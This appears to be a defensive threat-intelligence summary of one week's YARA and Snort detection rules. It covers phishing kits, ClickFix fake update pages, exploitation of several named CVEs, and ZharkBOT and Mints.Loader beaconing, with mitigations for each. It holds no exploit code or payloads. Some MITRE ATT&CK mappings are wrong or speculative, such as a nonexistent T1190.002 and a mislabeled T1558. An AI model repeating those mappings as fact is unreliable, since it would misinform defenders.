Full Report
The following is the information on Yara and Snort rules (week 5, October 2024) collected and shared by the AhnLab TIP service. 5 YARA Rules Detection name Description Source PK_EDD_prncpal Phishing Kit impersonating Employment Development Department California (EDD) https://github.com/t4d/PhishingKit-Yara-Rules PK_Eika_oio Phishing Kit impersonating Eika Bank https://github.com/t4d/PhishingKit-Yara-Rules PK_Huntington_code0t17 Phishing Kit impersonating Huntington bank https://github.com/t4d/PhishingKit-Yara-Rules PK_LeBonCoin_2022 Phishing […] 게시물 Weekly Detection Rule (YARA and Snort) Information – Week 5, October 2024이 ASEC에 처음 등장했습니다.
Analysis Summary
This summary synthesizes information regarding specific phishing kits detected via YARA rules and various vulnerabilities/malware families detected via Snort rules, as observed in week 5 of October 2024 by AhnLab TIP.
# Tool/Technique: Phishing Kits (Generic Collection)
## Overview
A collection of YARA rules designed to detect various phishing kits impersonating different entities, mostly financial institutions or major services (e.g., EDD California, Eika Bank, Huntington Bank, Le Bon Coin, Netflix). These kits are used by threat actors to steal credentials or sensitive information.
## Technical Details
- Type: Tool (Phishing Kit Components)
- Platform: Web Servers (Commonly targets user browsers)
- Capabilities: Deception, credential harvesting, imitation of legitimate login/information pages.
- First Seen: Not specified (Rules are for current detections in October 2024)
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment
- T1566.002 - Spearphishing Link
*Note: As components, the ultimate technique is Phishing (T1566).*
## Functionality
### Core Capabilities
- Impersonation of trusted organizations (Employment Development Department California, banks, Netflix).
- Collection of user input from deceptive web forms.
### Advanced Features
- Not detailed in the descriptions, but phishing kits often involve backend scripts for log parsing and credential submission.
## Indicators of Compromise
- File Hashes: N/A (Rules are based on file content/patterns)
- File Names: N/A (Specific file names are not listed in the summary table)
- Registry Keys: N/A
- Network Indicators: N/A (These rules target the deployed kit files)
- Behavioral Indicators: File contents matching specific known malware/phishing kit signatures.
## Associated Threat Actors
- Generic Cybercriminals/Phishing Operators
## Detection Methods
- Signature-based detection (YARA rules are provided for detection).
## Mitigation Strategies
- User training on recognizing phishing attempts.
- Implementing multi-factor authentication (MFA).
- Content filtering and network reputation checks to block known phishing domains.
## Related Tools/Techniques
- Other password harvesting scripts or web skimmers.
---
# Tool/Technique: ET TROJAN ClickFix Fake Browser Update Page Inbound M2
## Overview
A Snort rule designed to detect inbound network traffic associated with the ClickFix component, often related to fake browser update pages used to trick users into downloading malware.
## Technical Details
- Type: Malware/Infection Vector (Fake Update Scam)
- Platform: Network Communication (Inbound)
- Capabilities: Network communication associated with malware delivery via fake software updates.
- First Seen: Unknown (Rule published in week 5, October 2024 update)
## MITRE ATT&CK Mapping
- T1204 - User Execution
- T1204.002 - Malicious File
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP/HTTPS)
## Functionality
### Core Capabilities
- Detecting attempts to connect to resources associated with the ClickFix delivery mechanism.
### Advanced Features
- Specific to the delivery method utilized by the ClickFix campaign.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Network traffic patterns matching the rule signature.
- Behavioral Indicators: Inbound connections matching the defined signature payload or destination patterns.
## Associated Threat Actors
- Unknown (Associated with ClickFix scams)
## Detection Methods
- Signature-based detection (Snort rule).
## Mitigation Strategies
- User education regarding unsolicited software updates.
- Browser security settings enforcement.
- Network intrusion detection/prevention systems (NIDS/NIPS) using these rules.
## Related Tools/Techniques
- Various malvertising delivery chains.
---
# Tool/Technique: Grafana Post-Authentication DuckDB SQL Injection (CVE-2024-9264)
## Overview
A Snort rule detecting exploitation attempts against a specific SQL Injection vulnerability (CVE-2024-9264) in Grafana's DuckDB data source functionality, occurring after successful authentication.
## Technical Details
- Type: Vulnerability Exploitation
- Platform: Grafana Web Application (Server Side)
- Capabilities: Exploiting injection flaw to potentially steal data or execute unauthorized commands within the Grafana environment.
- First Seen: Unknown (Rule published week 5, October 2024)
## MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application
- T1190.002 - Exploit Web Application Functionality
- T1059 - Command and Scripting Interpreter (If used for further compromise)
## Functionality
### Core Capabilities
- Detecting HTTP requests attempting to inject payloads into Grafana's POST requests targeting the DuckDB feature.
### Advanced Features
- Specific to RCE/injection via CVE-2024-9264.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Malicious HTTP POST requests against Grafana instances.
- Behavioral Indicators: Payload patterns indicative of SQL injection targeting DuckDB.
## Associated Threat Actors
- Threat actors targeting Grafana instances globally.
## Detection Methods
- Signature-based detection (Snort rule based on specific request details).
## Mitigation Strategies
- Patching Grafana immediately to resolve CVE-2024-9264.
- Implementing Web Application Firewalls (WAFs) configured to block SQL injection patterns.
## Related Tools/Techniques
- Other application-layer injection techniques against data sources.
---
# Tool/Technique: Apache ShardingSphere ElasticJob-UI Privilege Escalation (CVE-2022-22733)
## Overview
Two Snort rules targeting exploitation attempts against Apache ShardingSphere ElasticJob-UI related to CVE-2022-22733, identifying both the attempt and the successful execution of a privilege escalation vulnerability.
## Technical Details
- Type: Vulnerability Exploitation
- Platform: Apache ShardingSphere ElasticJob-UI Server
- Capabilities: Attempting to escalate privileges within the ElasticJob-UI component.
- First Seen: Known vulnerability from 2022, rules updated October 2024.
## MITRE ATT&CK Mapping
- T1078 - Valid Accounts
- T1078.003 - Local Accounts (If leveraging successful local escalation)
- T1021 - Remote Services (Initial interaction)
- T1134 - Access Token Manipulation (Related to privilege escalation goal)
## Functionality
### Core Capabilities
- Detecting reconnaissance (Attempt) and exploitation (Successful Attempt) traffic for the specific vulnerability.
### Advanced Features
- Exploits parameters related to access control checks within the application.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic patterns matching the exploit vectors for CVE-2022-22733.
- Behavioral Indicators: Successful session creation or state change indicating privilege escalation achievement.
## Associated Threat Actors
- Actors targeting vulnerable Java applications and infrastructure management tools.
## Detection Methods
- Signature-based detection (Two Snort rules for attempt and success).
## Mitigation Strategies
- Applying patches released by the Apache ShardingSphere project to fix CVE-2022-22733.
- Restricting network access to management interfaces like ElasticJob-UI.
## Related Tools/Techniques
- Other privilege escalation techniques targeting Java applications.
---
# Tool/Technique: Zyxel USG/Zywall Authentication Bypass Attempt (CVE-2022-0342)
## Overview
A Snort rule detecting network attempts to exploit the authentication bypass vulnerability (CVE-2022-0342) present in Zyxel USG and ZyWALL products.
## Technical Details
- Type: Vulnerability Exploitation
- Platform: Zyxel USG/ZyWALL Firmware
- Capabilities: Bypassing user authentication mechanisms on the affected hardware/software devices.
- First Seen: Known vulnerability from 2022, rules updated October 2024.
## MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application
- T1078.004 - Cloud Accounts (If used to gain initial foothold on perimeter device)
- T1558 - Steal or Forge Credentials (If bypass leads to credential theft instead of direct access)
## Functionality
### Core Capabilities
- Identifying network traffic patterns designed to trigger the authentication flaw in Zyxel management interfaces.
### Advanced Features
- Exploits a specific flaw allowing unauthenticated access to administrative functions.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Malformed requests directed at Zyxel authentication endpoints.
- Behavioral Indicators: Traffic matching known exploit signatures for CVE-2022-0342.
## Associated Threat Actors
- Actors targeting exposed network appliances for initial access or botnet recruitment.
## Detection Methods
- Signature-based detection (Snort rule).
## Mitigation Strategies
- Immediately upgrading Zyxel firmware to versions mitigating CVE-2022-0342.
- Isolating management interfaces from the public internet where possible.
## Related Tools/Techniques
- Authentication bypasses targeting other firewall/VPN appliances.
---
# Tool/Technique: Rejetto HTTP File Server Template Injection (CVE-2024-23692)
## Overview
A Snort rule monitoring for exploitation attempts against Rejetto HTTP File Server (HFS) using the template injection vulnerability detailed in CVE-2024-23692.
## Technical Details
- Type: Vulnerability Exploitation
- Platform: Rejetto HTTP File Server (HFS)
- Capabilities: Executing arbitrary code or commands via template processing errors.
- First Seen: Unknown (Rule published week 5, October 2024)
## MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (If utilized on Windows-based HFS installations)
## Functionality
### Core Capabilities
- Detecting HTTP requests containing signatures indicative of template injection payload delivery.
### Advanced Features
- Enables remote code execution via template mechanism misuse.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Specific string patterns within HTTP requests aimed at HFS servers.
- Behavioral Indicators: Execution flow resulting from successful code injection.
## Associated Threat Actors
- General attackers scanning for vulnerable web services.
## Detection Methods
- Signature-based detection (Snort rule).
## Mitigation Strategies
- Discontinuing use of vulnerable Rejetto HFS or applying vendor patches/workarounds.
- Strict input validation on all web application fields.
## Related Tools/Techniques
- Other server-side template injection (SSTI) vulnerabilities.
---
# Tool/Technique: Splunk Enterprise < 9.1.2 XML Injection (CVE-2023-46214)
## Overview
A Snort rule targeting network activity associated with the XML injection vulnerability (CVE-2023-46214) in older versions of Splunk Enterprise, which could lead to server-side request forgery (SSRF) or information disclosure.
## Technical Details
- Type: Vulnerability Exploitation
- Platform: Splunk Enterprise (Web Interface)
- Capabilities: Injecting XML to manipulate internal application requests or steal configuration data.
- First Seen: Known vulnerability from 2023, rules updated October 2024.
## MITRE ATT&CK Mapping
- T1190 - Exploit Public-Facing Application
- T1071.001 - Web Protocols (Communication involving XML data structures)
- T1557 - Man-in-the-Middle (If SSRF is leveraged)
## Functionality
### Core Capabilities
- Identifying XML-formatted payload traffic directed at Splunk endpoints vulnerable to this flaw.
### Advanced Features
- Exploiting deserialization or parsing logic based on XML input.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic containing specific XML structures targeting Splunk.
- Behavioral Indicators: Unintended internal connections originating from the Splunk server processes (if SSRF is successful).
## Associated Threat Actors
- Actors targeting enterprise monitoring and logging infrastructure.
## Detection Methods
- Signature-based detection (Snort rule).
## Mitigation Strategies
- Upgrading Splunk Enterprise to version 9.1.2 or later.
- Network segmentation to restrict unauthorized internal access to Splunk.
## Related Tools/Techniques
- Other XML processing weaknesses in enterprise software.
---
# Tool/Technique: ZharkBOT CnC Activity (GET M1 & M2)
## Overview
Two Snort rules (M1 and M2) designed to detect Command and Control (C2) beaconing activity utilizing the GET method associated with the ZharkBOT malware family.
## Technical Details
- Type: Malware (ZharkBOT) C2 Communication
- Platform: Network Communication (HTTP GET requests)
- Capabilities: Maintaining persistent communication channel between infected hosts and the attacker's infrastructure.
- First Seen: Unknown (Rules active as of October 2024 updates)
## MITRE ATT&CK Mapping
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP C2 beaconing)
- T1041 - Exfiltration Over C2 Channel (If data is sent via these channels)
## Functionality
### Core Capabilities
- Detecting specific patterns, possibly URI structures or headers, used by ZharkBOT for beaconing.
### Advanced Features
- Separated rules (M1/M2) suggest multiple C2 patterns or infection stages are being monitored.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Traffic matching the specific C2 signatures utilized by ZharkBOT, likely involving specific URLs or user-agent strings.
- Behavioral Indicators: Regular, machine-generated HTTP GET requests.
## Associated Threat Actors
- Operators deploying ZharkBOT (type of information not specified).
## Detection Methods
- Signature-based network detection (Snort rules ET TROJAN ZharkBOT CnC Activity).
## Mitigation Strategies
- Blocking known ZharkBOT C2 infrastructure at the perimeter.
- Identifying and eradicating ZharkBOT infections on endpoints.
## Related Tools/Techniques
- Other malware families using basic HTTP GET C2 (e.g., Agent Tesla, FormBook).
---
# Tool/Technique: Mints.Loader CnC Activity (GET)
## Overview
A Snort rule detecting Command and Control (C2) beaconing traffic, utilizing the GET method, associated with the Mints.Loader malware.
## Technical Details
- Type: Malware (Mints.Loader) C2 Communication
- Platform: Network Communication (HTTP GET requests)
- Capabilities: Establishing C2 communication for instructions or data transfer.
- First Seen: Unknown (Rule published week 5, October 2024 update)
## MITRE ATT&CK Mapping
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (HTTP C2 beaconing)
## Functionality
### Core Capabilities
- Monitoring network traffic for Mints.Loader's characteristic C2 beacon signatures communicated over HTTP GET.
### Advanced Features
- Likely targets initial stage or persistent connectivity validation.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Specific URI patterns, headers, or hostnames associated with Mints.Loader C2 servers.
- Behavioral Indicators: Periodic, automated HTTP GET requests.
## Associated Threat Actors
- Unknown actors distributing or utilizing Mints.Loader.
## Detection Methods
- Signature-based network detection (Snort rule ET TROJAN Mints.Loader CnC Activity).
## Mitigation Strategies
- Blocking observed Mints.Loader C2 infrastructure.
- Ensuring endpoint security software can detect and remove Mints.Loader binaries.
## Related Tools/Techniques
- Other loader malware utilizing basic HTTP beaconing.